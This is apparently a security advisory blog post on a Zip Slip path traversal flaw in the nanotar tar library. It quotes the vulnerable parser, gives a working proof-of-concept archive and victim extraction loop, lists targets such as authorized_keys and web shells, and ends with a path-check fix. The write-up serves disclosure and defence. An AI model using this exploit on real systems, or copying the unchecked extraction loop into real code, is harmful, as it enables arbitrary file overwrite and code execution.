Feb 11, 2026·8 min read·6 visits
nanotar <= 0.2.0 trusts tar headers blindly. Attackers can include filenames with `../` sequences (Zip Slip) in archives. If you extract a malicious tarball using this library without manually validating paths, the attacker can overwrite any file your application has write access to (e.g., SSH keys, source code, config files).
A high-severity Path Traversal (Zip Slip) vulnerability exists in `nanotar` versions <= 0.2.0. The library, designed as a lightweight tar parser for the UnJS ecosystem, fails to sanitize file paths extracted from tar headers. This oversight allows attackers to craft malicious archives containing file names like `../../../etc/passwd`. When a developer uses `nanotar` to extract these archives—a primary use case for the library—the malicious paths facilitate arbitrary file writes outside the intended destination directory, potentially leading to Remote Code Execution (RCE) via configuration overwrite.
In the modern JavaScript ecosystem, everyone loves a micro-library. We want tools that are fast, zero-dependency, and do exactly one thing well. Enter nanotar, a part of the UnJS (Unified JavaScript Tools) suite. It promises a lightweight, portable way to parse and create tar archives. It's the kind of utility you pull in when you don't want the heavy lifting of node-tar or tar-stream. It's elegant, it's simple, and as it turns out, it's completely naive about the dangers of the outside world.
Here is the problem with minimalism: sometimes, code is minimal because it skipped the "boring" safety checks. nanotar is designed to take a buffer of binary data and turn it into a list of files. It reads the standard USTAR headers, extracts metadata, and hands you an object. The issue is that it hands you exactly what is in the header, verbatim. If the header says the file is named config.json, you get config.json. If the header says the file is named ../../../../../../root/.ssh/authorized_keys, nanotar shrugs and says, "Sure, here you go."
This isn't a new trick. We call this "Zip Slip," a vulnerability class that Snyk famously documented years ago. It’s the zombie of the security world—just when you think we've learned to sanitize archive paths, a new library pops up that forgets history. In this case, nanotar effectively acts as a unwitting accomplice, handing the developer a loaded gun (the malicious path) and pointing it directly at their own foot (the filesystem write operation).
To understand why this is happening, we need to look at how Tar (Tape Archive) files work. They are essentially a concatenation of files, each preceded by a 512-byte header block. This header contains the file name, mode, uid, gid, size, and checksum. Crucially, the file name field is just a string. The POSIX standard allows for directory structures, but it assumes the extracting tool will act as a gatekeeper.
In nanotar, the parsing logic lives in src/parse.ts. The library iterates through the buffer in 512-byte chunks. When it finds a header, it reads the bytes at offset 0 to 100 as the filename. It also supports PAX extended headers (the mechanism used for filenames longer than 100 bytes). If a PAX header is present, it overrides the standard filename with the long path.
Here is the logic flaw: nanotar treats these strings as immutable truth. It performs zero sanitization. It does not check for absolute paths (starting with /). It does not check for relative path traversal (../). It does not normalize the path. It essentially deserializes untrusted input directly into a control variable that developers will almost certainly use to determine file system destinations. It is a textbook example of CWE-22 (Improper Limitation of a Pathname to a Restricted Directory).
Let's inspect the crime scene in src/parse.ts. This is the code running in nanotar <= 0.2.0. Observe how the name variable is populated and then immediately committed to the result object without inspection.
// src/parse.ts in nanotar <= 0.2.0
// 1. Read standard USTAR name (100 bytes)
let name = _readString(buffer, offset, 100);
// ... code to parse size, mode, etc ...
// 2. Handle PAX Extended Headers (Long filenames)
// If the previous block was a PAX header, it might contain a 'path' property.
if (nextExtendedHeader) {
const longName = nextExtendedHeader.path || nextExtendedHeader.linkpath;
if (longName) {
// VULNERABILITY: The longName is blindly assigned to name.
// No check for "../", no check for "/", nothing.
name = longName;
}
}
// 3. Push to the array representing the tar contents
files.push({
name,
// ... other properties
data: fileData,
});There is no validation layer here. The _readString helper just slices the buffer and trims null bytes. The PAX handling just takes the string value. If an attacker constructs a tarball where the PAX header path value is ../index.js, the files array returned to the user will contain an entry with { name: "../index.js" }.
The library authors likely assumed that extraction (writing to disk) is the user's responsibility, and therefore validation is also the user's responsibility. However, in security engineering, secure-by-default is the gold standard. Returning raw, dangerous traversal sequences from a high-level parse function is a recipe for disaster because 99% of developers will simply loop through the results and fs.writeFile them.
Exploiting this is trivially easy because nanotar actually provides a createTar function that helps us build the weapon. We don't even need a hex editor; we can use the library against itself to generate the malicious archive. The goal is to create a tar entry that, when extracted by a victim script, writes outside the target directory.
Below is a Proof of Concept. Imagine a web service that accepts a tarball of images, unzips them to uploads/, and processes them. Our exploit will overwrite a critical system file instead.
import { createTar, parseTar } from 'nanotar';
import { writeFileSync, mkdirSync } from 'fs';
import { join, dirname } from 'path';
// --- THE ATTACKER ---
// Constructing the payload. Note the directory traversal.
const maliciousPayload = [
{
// We attempt to break out of the extract dir and hit /tmp
// In a real attack, this could be ../../../var/www/html/index.js
name: '../../../tmp/pwned_by_nanotar.txt',
data: new TextEncoder().encode('RCE via Zip Slip!')
}
];
// Create the binary tarball
const bomb = createTar(maliciousPayload);
// --- THE VICTIM ---
// A standard extraction loop found in many applications
const extractDir = '/app/uploads/extracted';
const parsedFiles = parseTar(bomb);
for (const file of parsedFiles) {
// VULNERABLE SINK: blindly joining the path
// join('/app/uploads/extracted', '../../../tmp/pwned.txt')
// resolves to '/tmp/pwned.txt' on Linux
const destination = join(extractDir, file.name);
console.log(`Extracting to: ${destination}`); // Spoilers: It's not in extractDir
mkdirSync(dirname(destination), { recursive: true });
writeFileSync(destination, file.data);
}When path.join encounters .., it resolves the path upwards. If the resulting path is passed to fs.writeFileSync, the file system permissions are the only thing stopping the overwrite. If the Node.js process runs as root (common in badly configured Docker containers), you own the box.
Why is an arbitrary file write so dangerous? It is rarely just about defacing a website. File Write is often the precursor to Remote Code Execution (RCE). If I can write a file anywhere your application can, I can change how your application behaves.
Consider the targets:
index.js or a route handler with a web shell. The next time the server restarts or the route is hit, my code runs..env, config.json, or database connection strings to point to a server I control./etc/shadow, /root/.ssh/authorized_keys, or add a cron job in /etc/cron.d/.The stealth of this attack is notable. The application doesn't crash. It happily processes the file, writes it where the attacker told it to, and continues. The administrator might not notice until the backdoor is triggered days later.
Since nanotar (at the time of version 0.2.0) does not sanitize input, the fix must be implemented in the application layer (the code using the library). You cannot rely on the library to protect you. The golden rule of file extraction is: Canonicalize, then Compare.
You must resolve the destination path to an absolute path and ensure it still starts with the expected destination directory. Here is the corrected logic:
import path from 'path';
const destDir = path.resolve('/app/uploads');
for (const file of parsedFiles) {
// 1. Resolve the full absolute path
const finalPath = path.resolve(destDir, file.name);
// 2. Security Check: Does the final path start with the destDir?
// We append path.sep to ensure /app/uploads-fake is not valid
if (!finalPath.startsWith(destDir + path.sep)) {
console.error(`Security Alert: Zip Slip attempt detected! Path: ${file.name}`);
continue; // Skip this file or throw an error
}
// 3. Safe to write
writeFileSync(finalPath, file.data);
}This simple check neutralizes the attack. Even if file.name is ../../etc/passwd, path.resolve will turn it into /etc/passwd. The startsWith check will see that /etc/passwd does not start with /app/uploads/, and the operation will be blocked. This is the only reliable defense against Zip Slip.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
nanotar unjs | <= 0.2.0 | N/A (Manual Mitigation Required) |
| Attribute | Detail |
|---|---|
| Vulnerability ID | CVE-2025-69874 |
| CWE ID | CWE-22 (Path Traversal) |
| CVSS v3.1 | 7.5 (High) |
| Attack Vector | Network |
| Impact | Arbitrary File Write / RCE |
| Exploit Status | PoC Available |
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.